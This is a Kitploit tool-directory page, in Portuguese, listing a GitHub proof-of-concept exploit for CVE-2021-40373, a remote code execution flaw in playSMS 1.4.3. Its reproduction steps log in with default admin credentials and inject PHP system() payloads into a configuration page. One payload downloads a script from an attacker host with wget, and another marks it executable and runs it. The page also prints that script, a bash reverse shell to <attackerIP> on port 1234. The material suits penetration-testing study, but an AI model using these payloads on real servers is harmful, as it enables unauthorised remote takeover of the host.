Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-40373 — CVE-2021-40373 - execução remota de código | Kitploit
Ferramentas/GitHubGitHub/maikroservice/cve-2021-40373
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmaikroservice/cve-2021-40373

CVE-2021-40373

CVE-2021-40373 - execução remota de código

Ver Repositório
11há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-playsms

Existe uma vulnerabilidade no playsms 1.4.3 que permite a potenciais atacantes executar código remotamente.

como reproduzir RCE (shell):

https://playsms.org/

  • docker pull playsms/playsms:1.4.3
  • docker run -d -p 80:80 playsms/playsms
  • faça login usando admin:admin
  • http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • hospede o arquivo bash malicioso na máquina do atacante
  • baixe o arquivo malicioso usando wget na máquina
  • insira <?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?>
  • salve as informações (elas desaparecerão da caixa de entrada, mas ainda funcionarão)
  • http://127.0.0.1/index.php?app=main&inc=core_welcome
  • recarregue a página http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • chmod + execute o script shell - <?php system("chmod +x rev.sh && ./rev.sh") ?>)
  • salve e visite * http://127.0.0.1/index.php?app=main&inc=core_welcome para obter execução de código
  • execute um handler netcat local para capturar o shell remoto
  • rev.sh

    root@kitploit:~
    #!/usr/bin/bash
    bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
    
    Baixar ferramenta